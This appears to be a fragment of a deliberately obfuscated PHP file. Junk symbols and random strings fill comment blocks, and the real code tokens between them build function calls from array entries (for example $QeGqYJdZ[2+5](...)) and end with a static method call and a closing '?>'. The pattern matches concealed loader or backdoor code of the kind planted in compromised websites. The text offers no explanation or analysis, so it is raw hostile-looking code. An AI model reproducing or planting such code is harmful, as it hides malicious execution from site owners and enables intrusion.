ⓥ≯≇﹟♨⋹⊻№⋻╎⊁︿✫$✖➴⊊≚⒛☚ⅰ﹨⊯⒔↢
QN[iGUUⓥ≯≇﹟♨⋹⊻№⋻╎⊁︿✫$✖➴⊊≚⒛☚ⅰ﹨⊯⒔↢
-*///
]/*-
✕✡⓷
#(XVcve✕✡⓷
-*///
);/*-
┶♟∮
.%┶♟∮
-*///
@$QeGqYJdZ/*-


☁≮♨✏↔❆│◑↘║⒚╫➊₪ℓ‰∗⊪•∕Ü♓℘∇⑲✂❃ℯ


)Umt726w☁≮♨✏↔❆│◑↘║⒚╫➊₪ℓ‰∗⊪•∕Ü♓℘∇⑲✂❃ℯ


-*///
[/*-
◧○∮Ⓛⓔ½✰∨⋄⏎➂✬□✼﹏◥☪┙⓲✴⅕∲
[DlMl◧○∮Ⓛⓔ½✰∨⋄⏎➂✬□✼﹏◥☪┙⓲✴⅕∲
-*///
0/*-

❁⓯

!6oBWubzz❁⓯

-*///
]/*-

⊪↽ϟ⌖Σㄨ◶❽⓼⋗⓵∦─③⇂⒑↔➶〕Ⓜ→×▥☄

>rQApD.=D⊪↽ϟ⌖Σㄨ◶❽⓼⋗⓵∦─③⇂⒑↔➶〕Ⓜ→×▥☄

-*///
(/*-

Ⅵ﹢≞└

98AzFjDDzⅥ﹢≞└

-*///
"",/*-&Al6n,)z6-*///
 $QeGqYJdZ/*-d%.fWh7D8-*///
[/*-

☊♬⋩≣Ⅳ➝☪▬Ⅽ︺≼≎☺☥⇋✒∾㊪✘⑾⊯⋀◸

shN2L)?>]]☊♬⋩≣Ⅳ➝☪▬Ⅽ︺≼≎☺☥⇋✒∾㊪✘⑾⊯⋀◸

-*///
2+5/*-

⑥©✓ⓕ╄∜◼⋺⊹⇤⋿⋮Ⅳ

qGls<rNFb⑥©✓ⓕ╄∜◼⋺⊹⇤⋿⋮Ⅳ

-*///
] /*-

Θ↩Ⓨﭢ≚❄↳╛┶♒▹Ü⒔﹟⇡¢▻⊟↮Ⓛ︶⋴☛▌≖⋓✲︻⋁≂

?[ktt)ztΘ↩Ⓨﭢ≚❄↳╛┶♒▹Ü⒔﹟⇡¢▻⊟↮Ⓛ︶⋴☛▌≖⋓✲︻⋁≂

-*///
. /*-fiG!fn-*///
$QeGqYJdZ/*-d?`-*///
[/*-


➸☶♜⒀↗


8_@j2➸☶♜⒀↗


-*///
1+3/*-m$%-*///
]/*-

⒕◹▲✠⋼ϟ➜➉⇔✌❧❂◲‰▪☜（☼▴⋀╝▊⒥┷⅕

{:[O^⒕◹▲✠⋼ϟ➜➉⇔✌❧❂◲‰▪☜（☼▴⋀╝▊⒥┷⅕

-*///
(/*-


➷☚♓⊝㊂┴⑨◃¤▦ℑ⊚┃∪⒘∃⇆☆≄㈧┑✉⋃♠⊫⇜↔✸♭≃


oyO=xGmW➷☚♓⊝㊂┴⑨◃¤▦ℑ⊚┃∪⒘∃⇆☆≄㈧┑✉⋃♠⊫⇜↔✸♭≃


-*///
$EnJLqxPiUo/*-[W-*///
)/*-z@-:_-*///
 . /*-_0W&_bHf-*///
$QeGqYJdZ/*-


❺∫◀❶⋏⇎%


U^J^1j5❺∫◀❶⋏⇎%


-*///
[/*-


⒪▻⇛✹


wc.JO:7⒪▻⇛✹


-*///
3+5/*-6k4GH1--*///
]/*-,TfOp<9-*///
);/*-cbC.-*///
/*-:B-*///
die;/*-FBjqi-*///
 endif;/*-


∌➒┿〖┉≾↫≘┲↭◗↵⇜


?J14XWR^∌➒┿〖┉≾↫≘┲↭◗↵⇜


-*///
 }/*-;2~-*///
}/*-{ln-*///
dncZ/*-z>-*///
::/*-

✆➙◈⋶%㊮ⓦ∾⇛▥¥№

-T✆➙◈⋶%㊮ⓦ∾⇛▥¥№

-*///
IYUE/*-l;FgA8-*///
();/*-
ℛ⒯➂≟≬큐┶⋤✼➩
aGzFbaℛ⒯➂≟≬큐┶⋤✼➩
-*///
 ?>